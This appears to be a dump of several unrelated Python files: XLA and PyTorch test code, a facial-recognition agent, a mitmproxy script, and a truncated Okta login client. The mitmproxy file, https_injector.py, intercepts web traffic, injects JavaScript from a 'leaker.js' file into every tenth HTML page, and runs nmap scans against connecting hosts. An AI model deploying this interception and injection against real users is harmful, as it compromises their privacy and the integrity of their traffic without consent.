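# i.e. 1 -> 2 -> 4 -> 8 -> 16, so 16 is the first value for which the condition
# fails and becomes the loop result.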
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
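# Illustrative note (not part of the original test file): Conditional applies
# true_computation to true_operand when pred is True (3.0 * 2 = 6.0) and
# false_computation to false_operand when pred is False; the expected value 1.0
# implies that _CreateConstantF32Computation() ignores its operand and returns
# the constant 1.0.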
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.Infeed(xla_client.Shape.from_pyval(to_infeed[0]))
compiled_c = c.Build().CompileWithExampleArguments()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = compiled_c.ExecuteWithPythonValues()
self.assertEqual(result, item)
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x = c.Infeed(xla_client.Shape.from_pyval(to_round_trip[0]))
c.Outfeed(x)
compiled_c = c.Build().CompileWithExampleArguments()
for want in to_round_trip:
execution = threading.Thread(target=compiled_c.Execute)
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.Shape.from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
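# Illustrative note (not part of the original test file): Execute() blocks until
# the computation's Infeed is fed and its Outfeed is drained, which is why the
# test above runs it on a worker thread. The round-trip pattern for one value is:
#
#   execution = threading.Thread(target=compiled_c.Execute)
#   execution.start()
#   xla_client.transfer_to_infeed(want)
#   got = xla_client.transfer_from_outfeed(xla_client.Shape.from_pyval(want))
#   execution.join()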
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
c.Scatter(c.Constant(a), c.Constant(scatter_indices), c.Constant(updates),
self._CreateBinaryAddS32Computation(), dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]], dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=expected)
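# Illustrative note (not part of the original test file): with these dimension
# numbers the Scatter call behaves like an indexed add over whole rows, roughly
# the NumPy equivalent of:
#
#   expected = a.copy()
#   expected[scatter_indices] += updates   # rows 0 and 2 receive the updates
#
# which turns [[0,1,2],[3,4,5],[6,7,8]] into [[10,21,32],[3,4,5],[76,87,98]].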
class ErrorTest(ComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument shape.*xla_client_test.py.*"
r"expected s32\[\], got f32\[\]",
lambda: c.Build().CompileWithExampleArguments([self.f32_scalar_2]))
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).CompileWithExampleArguments([arg])
ans = compiled_c.ExecuteWithPythonValues([arg])
np.testing.assert_allclose(ans, 4.14)
if __name__ == "__main__":
unittest.main()
|
test_tracker.py
|
# Copyright 2019 Kakao Brain
#
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
#
# This source code is licensed under the BSD license found in the
# LICENSE file in the root directory of this source tree.
from queue import Queue
import threading
import pytest
import torch
from torch import nn
from torch.distributed.pipeline.sync.checkpoint import enable_checkpointing, enable_recomputing
from torch.distributed.pipeline.sync.microbatch import Batch
from torch.distributed.pipeline.sync.skip import pop, skippable, stash
from torch.distributed.pipeline.sync.skip.layout import SkipLayout
from torch.distributed.pipeline.sync.skip.tracker import SkipTracker, SkipTrackerThroughPotals, current_skip_tracker
def test_default_skip_tracker():
q = Queue()
def f():
q.put(current_skip_tracker())
t = threading.Thread(target=f)
t.start()
t.join()
skip_tracker = q.get()
assert type(skip_tracker) is SkipTracker
assert type(skip_tracker) is not SkipTrackerThroughPotals
@pytest.mark.skipif(not torch.cuda.is_available(), reason="cuda required")
def test_default_skip_tracker_by_data_parallel():
@skippable(stash=["foo"])
class Stash(nn.Module):
def forward(self, input):
yield stash("foo", input)
return input * 2 # noqa
@skippable(pop=["foo"])
class Pop(nn.Module):
def forward(self, input):
foo = yield pop("foo")
return foo
model = nn.Sequential(Stash(), Pop())
model = nn.DataParallel(model, device_ids=[0, 0], output_device=0)
input = torch.rand(10, device=0)
output = model(input)
assert torch.allclose(output, input)
def test_reuse_portal():
skip_layout = SkipLayout(num_partitions=2, skip_routes={(None, "test"): (0, 1)})
skip_tracker = SkipTrackerThroughPotals(skip_layout)
batch = Batch(torch.tensor([1.0]))
a = torch.tensor([2.0])
b = torch.tensor([2.0])
skip_tracker.save(batch, None, "test", a)
portal = skip_tracker.portals[(None, "test")]
skip_tracker.save(batch, None, "test", b)
assert portal is skip_tracker.portals[(None, "test")]
def test_no_copy_no_portal():
skip_layout = SkipLayout(num_partitions=2, skip_routes={(None, "copy"): (0, 1), (None, "not_copy"): (0, 0)})
skip_tracker = SkipTrackerThroughPotals(skip_layout)
batch = Batch(torch.tensor([1.0]))
a = torch.tensor([2.0])
b = torch.tensor([2.0])
skip_tracker.save(batch, None, "copy", a)
skip_tracker.save(batch, None, "not_copy", b)
assert (None, "copy") in skip_tracker.portals
assert (None, "copy") not in skip_tracker.tensors
assert (None, "not_copy") in skip_tracker.tensors
assert (None, "not_copy") not in skip_tracker.portals
def test_tensor_life_without_checkpointing():
skip_layout = SkipLayout(num_partitions=2, skip_routes={(None, "test"): (0, 1)})
skip_tracker = SkipTrackerThroughPotals(skip_layout)
batch = Batch(torch.tensor([1.0]))
tensor = torch.tensor([2.0])
skip_tracker.save(batch, None, "test", tensor)
assert skip_tracker.portals[(None, "test")].tensor_life == 1
skip_tracker.load(batch, None, "test")
assert skip_tracker.portals[(None, "test")].tensor_life == 0
def test_tensor_life_with_checkpointing():
skip_layout = SkipLayout(num_partitions=2, skip_routes={(None, "test"): (0, 1)})
skip_tracker = SkipTrackerThroughPotals(skip_layout)
batch = Batch(torch.tensor([1.0]))
tensor = torch.tensor([2.0])
with enable_checkpointing():
skip_tracker.save(batch, None, "test", tensor)
assert skip_tracker.portals[(None, "test")].tensor_life == 2
with enable_checkpointing():
skip_tracker.load(batch, None, "test")
assert skip_tracker.portals[(None, "test")].tensor_life == 1
with enable_recomputing():
skip_tracker.load(batch, None, "test")
assert skip_tracker.portals[(None, "test")].tensor_life == 0
with enable_recomputing():
skip_tracker.save(batch, None, "test", tensor)
assert skip_tracker.portals[(None, "test")].tensor_life == 0
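# Illustrative note (not part of the original test file): the two tensor_life
# tests above capture the portal's reference-counting contract. Without
# checkpointing a saved tensor is kept alive for exactly one load (life 1 -> 0).
# Under enable_checkpointing() the save reserves two uses -- the checkpointed
# forward pass and the later recomputation -- and each subsequent load, whether
# under enable_checkpointing() or enable_recomputing(), decrements the count;
# a save issued during recomputation leaves the exhausted count at zero.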
|
agent.py
|
#!/usr/bin/env python3
""" HIAS TassAI Facial Recognition Agent.
HIAS TassAI Facial Recognition Agent processes streams from local
or remote cameras to identify known and unknown humans.
MIT License
Copyright (c) 2021 Asociación de Investigacion en Inteligencia Artificial
Para la Leucemia Peter Moss
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files(the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Contributors:
- Adam Milton-Barker
"""
import sys
from abc import ABC, abstractmethod
from modules.AbstractAgent import AbstractAgent
from modules.helpers import helpers
from modules.model import model
from modules.read import read
from modules.stream import stream
from modules.sockets import sockets
from threading import Thread
class agent(AbstractAgent):
""" HIAS TassAI Facial Recognition Agent
HIAS TassAI Facial Recognition Agent processes
streams from local or remote cameras to identify
known and unknown humans.
"""
def set_model(self, mtype):
# Initializes the TassAI model
self.model = model(self.helpers)
def load_model(self):
""" Loads the trained model """
# Prepares the network and data
self.model.prepare_network()
self.model.prepare_data()
def server(self):
""" Loads the API server """
# Starts the MQTT connection
self.mqtt_start()
# Initializes the socket
self.sockets = sockets(self.helpers)
# Loads the TassAI model
self.load_model()
# Camera read and stream threads
Thread(target=read.run, args=(self, ),
daemon=True).start()
Thread(target=stream.run, args=(self, ),
daemon=True).start()
def signal_handler(self, signal, frame):
self.helpers.logger.info("Disconnecting")
self.mqtt.disconnect()
sys.exit(1)
agent = agent()
def main():
if len(sys.argv) < 2:
agent.helpers.logger.info(
"You must provide an argument")
exit()
elif sys.argv[1] not in agent.helpers.confs["agent"]["params"]:
agent.helpers.logger.info(
"Mode not supported! server, train or inference")
exit()
mode = sys.argv[1]
if mode == "classify":
agent.set_model("")
agent.inference()
elif mode == "server":
agent.set_model("")
agent.server()
if __name__ == "__main__":
main()
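# Usage sketch (illustrative, not part of the original file; the accepted modes
# ultimately come from confs["agent"]["params"], so these two are assumptions
# based on the branches in main() above):
#
#   python3 agent.py server     # start MQTT, sockets, the model and camera threads
#   python3 agent.py classify   # load the model and run inference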
|
https_injector.py
|
from mitmproxy.options import Options
from mitmproxy.proxy.config import ProxyConfig
from mitmproxy.proxy.server import ProxyServer
from mitmproxy.tools.dump import DumpMaster
from mitmproxy.net.http.http1.assemble import assemble_request
from bs4 import BeautifulSoup
import threading,asyncio,time,Levenshtein,pandas,sqlite3
from scapy.all import *
from scapy.layers.http import HTTPRequest # import HTTP packet
from mitmproxy.utils import strutils
from mitmproxy import ctx
from mitmproxy import http
import ipaddress,nmap,random
class Addon(object):
num=1
def request(self, flow):
self.num += 1
# every few requests, trigger a probing pass
print('probs')
print(self.num)
filtered = self.list_filtering(flow)
if filtered[0]:
flow.response = http.HTTPResponse.make(
400, # (optional) status code
self.return_htmlerror(filtered[2],filtered[1]), # (optional) content
{"Content-Type": "text/html"} # (optional) headers
)
def response(self,flow):
#header analysis
proxy_headers = ['HTTP_X_FORWARDED_FOR','HTTP_X_FORWARDED','HTTP_PROXY_AGENT','HTTP_VIA','HTTP_PROXY_CONNECTION','HTTP_CLIENT_IP']
for i in flow.response.headers:
if i in proxy_headers:
soup = BeautifulSoup(self.return_htmlerror(5543, "Proxy Intrusion Detected.."), 'lxml')
flow.response.text = str(soup).encode("utf8")
netrequest = assemble_request(flow.request).decode('utf-8')
print("Recieved requests:",netrequest)
if flow.response.headers['Content-Type'] != 'text/html':
return
if not flow.response.status_code == 200:
return
#process every 10 requests
if self.num % 10 == 0 :
html = BeautifulSoup(flow.response.text, 'lxml')
container = html.head or html.body
if container:
script = html.new_tag('script', type='text/javascript')
script.string = injected_javascript
container.insert(0, script)
flow.response.text = str(html)
def list_filtering(self,filter_param):
#url filter
if self.sqlread_exists("url_filter","url",filter_param.request.pretty_url):
print('Found Blacklisted URL,Blocking')
return [True,"Blacklisted URL Breach..",5545]
# now that we have the IP address, load the other lists and compare against them
if filter_param.server_conn.ip_address:
if self.sqlread_exists("AI_filter","ip",filter_param.server_conn.ip_address[0]):
print('Proxy found by AI....')
return [True,"Stopping Breach,Heurestics Identified Proxy....",5544]
ipint = int(ipaddress.IPv4Address(filter_param.server_conn.ip_address[0]))
if self.sqlcheck_ip(ipint):
print('Found Blacklisted IP,Blocking')
return [True,"Blacklisted IP Breach..",5546]
# Tor exit node filter
if self.sqlread_exists("tor_filter","tor_exitnodes",filter_param.request.pretty_url):
print('Found Blacklisted Tor URL node')
return [True,"Privacy breach (Tor Exit node)..",5547]
#the connection is going to a tor client
if filter_param.request.pretty_url.find('/tor/server/') != -1:
return [True,"Privacy breach (Tor Exit node)..",5547]
if self.checknmap(filter_param.server_conn.ip_address[0],filter_param.server_conn.ip_address[1]):
return [True,"Proxy detected by scanners...",5548]
else:
self.addtonmap(filter_param.server_conn.ip_address[0],filter_param.server_conn.ip_address[1])
return [False,"",0]
def return_htmlerror(self,errorcode,errordescrp):
rep = error_html.replace('errorcode',str(errorcode)).replace('errordescription',str(errordescrp))
return rep.encode()
def sqlcheck_ip(self,ipint):
hfl = cursor.execute("""SELECT COUNT(*) FROM blacklisted WHERE ? BETWEEN first AND last;""", [ipint])
ret = hfl.fetchone()[0]
print("Returning ip range check=",ret)
return ret
def sqlread_exists(self,table,idm,value):
hfl = cursor.execute("""SELECT COUNT(*) FROM """ +str(table) +""" WHERE """+str(idm) +""" = ?;""", [str(value)])
ret = hfl.fetchone()[0]
print(table," ",idm," ",value,"=",ret)
return ret
def addtonmap(self,ip,port):
print("Trying adding to db",ip,port)
hfl = cursor.execute("""SELECT COUNT(*) FROM nmap_processed WHERE processed = 0 AND ip = ?;""",[str(ip)])
fkr = hfl.fetchone()[0]
print("found",fkr)
if fkr == 0:
cursor.executemany("""INSERT INTO nmap_processed VALUES (?,?,0);""",[(str(ip),port)])
conn.commit()
def checknmap(self,ip,port):
hfl = cursor.execute("""SELECT COUNT(*) FROM nmap_processed WHERE processed = 2 AND ip = ?;""",[str(ip)])
fkr = hfl.fetchone()[0]
print("Checking nmap database",fkr)
ret = True if fkr != 0 else False
return ret
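# Illustrative note (not part of the original file): the nmap_processed table acts
# as a small work queue keyed on the "processed" column -- addtonmap() inserts
# rows with 0 (pending scan), scan_callback() marks a host 2 when an open-proxy
# service is found and 1 when the scan errors out, and checknmap() only blocks
# traffic for hosts already marked 2.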
def scan_callback(host, scan_result):
print('_______________________________________________________________________')
print(host,scan_result)
time.sleep(5+random.randint(2,5))
proxy_methods = ['polipo','squid-http','http-proxy']
try:
for i in scan_result['scan'][host]['tcp']:
if scan_result['scan'][host]['tcp'][i]['name'] in proxy_methods:
print("Proxy detected blocking")
cursor.execute("""UPDATE nmap_processed SET processed = 2 WHERE ip = ?;""",[str(host)])
conn.commit()
except Exception as e:
print("Scan error")
cursor.execute("""UPDATE nmap_processed SET processed = 1 WHERE ip = ?;""",[str(host)])
conn.commit()
print('_______________________________________________________________________')
# NOTE: this single-host variant is immediately shadowed by the batch-scanning
# nmap_parse() defined below, so only the second definition is ever called.
def nmap_parse():
print("Started Thread")
nm = nmap.PortScannerAsync()
re_scan = nm.scan(hosts="127.0.0.1", arguments='--script http-open-proxy.nse -p8080', callback=scan_callback)
while nm.still_scanning():
print("Continuing on batch scan ...")
def nmap_parse():
hfl = cursor.execute("""SELECT * FROM nmap_processed WHERE processed = 0;""")
fkr = hfl.fetchall()
nm = nmap.PortScannerAsync()
for host in fkr:
re_scan = nm.scan(hosts=host[0], arguments='--script http-open-proxy.nse -p' +str(host[1]), callback=scan_callback)
while nm.still_scanning():
print("Continuing on batch scan ...")
nm.wait(2)
# see source mitmproxy/master.py for details
#def loop_in_thread(loop, m):
# asyncio.set_event_loop(loop) # This is the key.
# m.run_loop(loop.run_forever)
if __name__ == "__main__":
conn = sqlite3.connect('db/filtered.db',check_same_thread=False)
cursor = conn.cursor()
print(cursor)
with open('leaker.js', 'r') as f:
injected_javascript = f.read()
error_html = open('GUI/error.html').read()
threading.Timer(5, nmap_parse).start()
options = Options(listen_host='0.0.0.0', listen_port=8080, http2=True,client_certs='certs/')
m = DumpMaster(options, with_termlog=True, with_dumper=False)
config = ProxyConfig(options)
m.server = ProxyServer(config)
m.addons.add(Addon())
# run mitmproxy in the background, especially when integrated with another server
loop = asyncio.get_event_loop()
asyncio.set_event_loop(loop) # This is the key.
m.run_loop(loop.run_forever)
#t = threading.Thread( target=loop_in_thread, args=(loop,m) )
#t.start()
print('going to shutdown mitmproxy')
m.shutdown()
|
okta.py
|
"""
Copyright 2016-present Nike, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
You may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
"""
import base64
import copy
import getpass
import re
import socket
import time
import uuid
import webbrowser
from codecs import decode
from multiprocessing import Process
from urllib.parse import parse_qs
from urllib.parse import urlparse, quote
import keyring
import requests
from bs4 import BeautifulSoup
from fido2.utils import websafe_decode
from keyring.backends.fail import Keyring as FailKeyring
from keyring.errors import PasswordDeleteError
from requests.adapters import HTTPAdapter, Retry
from gimme_aws_creds.u2f import FactorU2F
from gimme_aws_creds.webauthn import WebAuthnClient, FakeAssertion
from . import errors, ui, version, duo
from .errors import GimmeAWSCredsMFAEnrollStatus
from .registered_authenticators import RegisteredAuthenticators
class OktaClient(object):
"""
The Okta Client Class performs the necessary API
calls to Okta to get temporary AWS credentials. An
Okta API key and URL must be provided.
"""
KEYRING_SERVICE = 'gimme-aws-creds'
KEYRING_ENABLED = not isinstance(keyring.get_keyring(), FailKeyring)
def __init__(self, gac_ui, okta_org_url, verify_ssl_certs=True, device_token=None):
"""
:type gac_ui: ui.UserInterface
:param okta_org_url: Base URL string for Okta IDP.
:param verify_ssl_certs: Enable/disable SSL verification
"""
self.ui = gac_ui
self._okta_org_url = okta_org_url
self._verify_ssl_certs = verify_ssl_certs
if verify_ssl_certs is False:
requests.packages.urllib3.disable_warnings()
self._username = None
self._password = None
self._preferred_mfa_type = None
self._mfa_code = None
self._remember_device = None
self._use_oauth_access_token = False
self._use_oauth_id_token = False
self._oauth_access_token = None
self._oauth_id_token = None
self._jar = requests.cookies.RequestsCookieJar()
# Allow up to 5 retries on requests to Okta in case we have network issues
self._http_client = requests.Session()
self._http_client.cookies = self._jar
self.device_token = device_token
retries = Retry(total=5, backoff_factor=1,
method_whitelist=['GET', 'POST'])
self._http_client.mount('https://', HTTPAdapter(max_retries=retries))
@property
def device_token(self):
return self._http_client.cookies.get('DT')
@device_token.setter
def device_token(self, device_token):
if device_token is not None:
match = re.search(r'^https://(.*)/?', self._okta_org_url)
self._http_client.cookies.set('DT', device_token, domain=match.group(1), path='/')
def set_username(self, username):
self._username = username
def set_password(self, password):
self._password = password
def set_preferred_mfa_type(self, preferred_mfa_type):
self._preferred_mfa_type = preferred_mfa_type
def set_mfa_code(self, mfa_code):
self._mfa_code = mfa_code
def set_remember_device(self, remember_device):
self._remember_device = bool(remember_device)
def use_oauth_access_token(self, val=True):
self._use_oauth_access_token = val
def use_oauth_id_token(self, val=True):
self._use_oauth_id_token = val
def stepup_auth(self, embed_link, state_token=None):
""" Login to Okta using the Step-up authentication flow"""
flow_state = self._get_initial_flow_state(embed_link, state_token)
while flow_state.get('apiResponse', {}).get('status') != 'SUCCESS':
time.sleep(0.5)
flow_state = self._next_login_step(
flow_state.get('stateToken'), flow_state.get('apiResponse'))
return flow_state['apiResponse']
def stepup_auth_saml(self, embed_link, state_token=None):
""" Login to a SAML-protected service using the Step-up authentication flow"""
api_response = self.stepup_auth(embed_link, state_token)
# if a session token is in the API response, we can use that to authenticate
if 'sessionToken' in api_response:
saml_response = self.get_saml_response(
embed_link + '?sessionToken=' + api_response['sessionToken'])
else:
saml_response = self.get_saml_response(
api_response['_links']['next']['href'])
login_result = self._http_client.post(
saml_response['TargetUrl'],
data=saml_response,
verify=self._verify_ssl_certs
)
return login_result.text
def auth(self):
""" Login to Okta using the authentication API"""
flow_state = self._login_username_password(None, self._okta_org_url + '/api/v1/authn')
while flow_state.get('apiResponse', {}).get('status') != 'SUCCESS':
time.sleep(0.5)
flow_state = self._next_login_step(
flow_state.get('apiResponse', {}).get('stateToken'), flow_state.get('apiResponse'))
return flow_state['apiResponse']
def auth_session(self, **kwargs):
""" Authenticate the user and return the Okta Session ID and username"""
login_response = self.auth()
session_url = self._okta_org_url + '/login/sessionCookieRedirect'
if 'redirect_uri' not in kwargs:
redirect_uri = 'http://localhost:8080/login'
else:
redirect_uri = kwargs['redirect_uri']
params = {
'token': login_response['sessionToken'],
'redirectUrl': redirect_uri
}
response = self._http_client.get(
session_url,
params=params,
headers=self._get_headers(),
verify=self._verify_ssl_certs,
allow_redirects=False
)
return {
"username": login_response['_embedded']['user']['profile']['login'],
"session": response.cookies['sid'],
"device_token": self._http_client.cookies['DT']
}
def auth_oauth(self, client_id, **kwargs):
""" Login to Okta and retrieve access token, ID token or both """
login_response = self.auth()
if 'access_token' not in kwargs:
access_token = True
else:
access_token = kwargs['access_token']
if 'id_token' not in kwargs:
id_token = False
else:
id_token = kwargs['id_token']
if 'scopes' not in kwargs:
scopes = ['openid']
else:
scopes = kwargs['scopes']
response_types = []
if id_token is True:
response_types.append('id_token')
if access_token is True:
response_types.append('token')
if 'authorization_server' not in kwargs:
oauth_url = self._okta_org_url + '/oauth2/v1/authorize'
else:
oauth_url = self._okta_org_url + '/oauth2/' + kwargs['authorization_server'] + '/v1/authorize'
if 'redirect_uri' not in kwargs:
redirect_uri = 'http://localhost:8080/login'
else:
redirect_uri = kwargs['redirect_uri']
if 'nonce' not in kwargs:
nonce = uuid.uuid4().hex
else:
nonce = kwargs['nonce']
if 'state' not in kwargs:
state = 'auth_oauth'
else:
state = kwargs['state']
params = {
'sessionToken': login_response['sessionToken'],
'client_id': client_id,
'redirect_uri': redirect_uri,
'nonce': nonce,
'state': state,
'response_type': ' '.join(response_types),
'scope': ' '.join(scopes)
}
response = self._http_client.get(
oauth_url,
params=params,
headers=self._get_headers(),
verify=self._verify_ssl_certs,
allow_redirects=False
)
response.raise_for_status()
url_parse_results = urlparse(response.headers['Location'])
query_result = parse_qs(url_parse_results.fragment)
tokens = {}
if 'access_token' in query_result:
tokens['access_token'] = query_result['access_token'][0]
self._oauth_access_token = query_result['access_token'][0]
if 'id_token' in query_result:
tokens['id_token'] = query_result['id_token'][0]
self._oauth_id_token = query_result['id_token'][0]
return tokens
@staticmethod
def _get_headers():
"""sets the default headers"""
headers = {
'User-Agent': "gimme-aws-creds {}".format(version),
'Accept': 'application/json',
'Content-Type': 'application/json',
}
return headers
def _get_initial_flow_state(self, embed_link, state_token=None):
""" Starts the authentication flow with Okta"""
if state_token is None:
response = self._http_client.get(
embed_link, allow_redirects=False)
response.raise_for_status()
url_parse_results = urlparse(response.headers['Location'])
state_token = parse_qs(url_parse_results.query)['stateToken'][0]
response = self._http_client.post(
self._okta_org_url + '/api/v1/authn',
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
return {'stateToken': state_token, 'apiResponse': response.json()}
def _next_login_step(self, state_token, login_data):
""" decide what the next step in the login process is"""
if 'errorCode' in login_data:
raise errors.GimmeAWSCredsError(
"LOGIN ERROR: {} | Error Code: {}".format(login_data['errorSummary'], login_data['errorCode']), 2)
status = login_data['status']
if status == 'UNAUTHENTICATED':
return self._login_username_password(state_token, login_data['_links']['next']['href'])
elif status == 'LOCKED_OUT':
raise errors.GimmeAWSCredsError("Your Okta access has been locked out due to failed login attempts.", 2)
elif status == 'MFA_ENROLL':
raise GimmeAWSCredsMFAEnrollStatus()
elif status == 'MFA_REQUIRED':
return self._login_multi_factor(state_token, login_data)
elif status == 'MFA_CHALLENGE':
if login_data['_embedded']['factor']['factorType'] == 'u2f':
return self._check_u2f_result(state_token, login_data)
if login_data['_embedded']['factor']['factorType'] == 'webauthn':
return self._check_webauthn_result(state_token, login_data)
if 'factorResult' in login_data and login_data['factorResult'] == 'WAITING':
return self._check_push_result(state_token, login_data)
else:
return self._login_input_mfa_challenge(state_token, login_data['_links']['next']['href'])
else:
raise RuntimeError('Unknown login status: ' + status)
def _print_correct_answer(self, answer):
""" prints the correct answer to the additional factor authentication step in Okta Verify"""
self.ui.info("Additional factor correct answer is: " + str(answer))
def _login_username_password(self, state_token, url):
""" login to Okta with a username and password"""
creds = self._get_username_password_creds()
login_json = {
'username': creds['username'],
'password': creds['password']
}
# If this isn't a Step-up auth flow, we won't have a stateToken
if state_token is not None:
login_json['stateToken'] = state_token
response = self._http_client.post(
url,
json=login_json,
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response_data = response.json()
if response.status_code == 200:
pass
# Handle known Okta error codes
# ref: https://developer.okta.com/docs/reference/error-codes/#example-errors-listed-by-http-return-code
elif response.status_code in [400, 401, 403, 404, 409, 429, 500, 501, 503]:
if response_data['errorCode'] == "E0000004":
if self.KEYRING_ENABLED:
try:
self.ui.info("Stored password is invalid, clearing. Please try again")
keyring.delete_password(self.KEYRING_SERVICE, creds['username'])
except PasswordDeleteError:
pass
raise errors.GimmeAWSCredsError(
"LOGIN ERROR: {} | Error Code: {}".format(response_data['errorSummary'], response_data['errorCode']), 2)
# If the error code isn't one we know how to handle, raise an exception
else:
response.raise_for_status()
func_result = {'apiResponse': response_data}
if 'stateToken' in response_data:
func_result['stateToken'] = response_data['stateToken']
return func_result
def _login_send_sms(self, state_token, factor):
""" Send SMS message for second factor authentication"""
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("A verification code has been sent to " + factor['profile']['phoneNumber'])
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_send_call(self, state_token, factor):
""" Send Voice call for second factor authentication"""
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("You should soon receive a phone call at " + factor['profile']['phoneNumber'])
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_send_push(self, state_token, factor):
""" Send 'push' for the Okta Verify mobile app """
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("Okta Verify push sent...")
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_input_webauthn_challenge(self, state_token, factor):
""" Retrieve nonce """
response = self._http_client.post(
factor['_links']['verify']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("Challenge with security keys ...")
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
@staticmethod
def get_available_socket():
"""Get available socket, but requesting 0 and allowing OS to provide ephemeral open port"""
s = socket.socket()
s.bind(('127.0.0.1', 0))
server_address = s.getsockname()
return server_address
def _login_duo_challenge(self, state_token, factor):
""" Duo MFA challenge """
passcode = self._mfa_code
if factor['factorType'] is None:
# Prompt user for which Duo factor to use
raise duo.FactorRequired(factor['id'], state_token)
if factor['factorType'] == "passcode" and not passcode:
try:
passcode = self.ui.input("Enter verification code (remember to refresh token between uses): ")
except Exception:
raise duo.PasscodeRequired(factor['id'], state_token)
response_data = self._get_response_data(factor['_links']['verify']['href'], state_token)
verification = response_data['_embedded']['factor']['_embedded']['verification']
socket_addr = self.get_available_socket()
auth = None
duo_client = duo.Duo(self.ui, verification, state_token, socket_addr, factor['factorType'])
if factor['factorType'] == "web":
# Duo Web via local browser
self.ui.info("Duo required; opening browser...")
proc = Process(target=duo_client.trigger_web_duo)
proc.start()
time.sleep(2)
webbrowser.open_new('http://{host}:{port}/duo.html'.format(host=socket_addr[0], port=socket_addr[1]))
elif factor['factorType'] == "passcode":
# Duo auth with OTP code without a browser
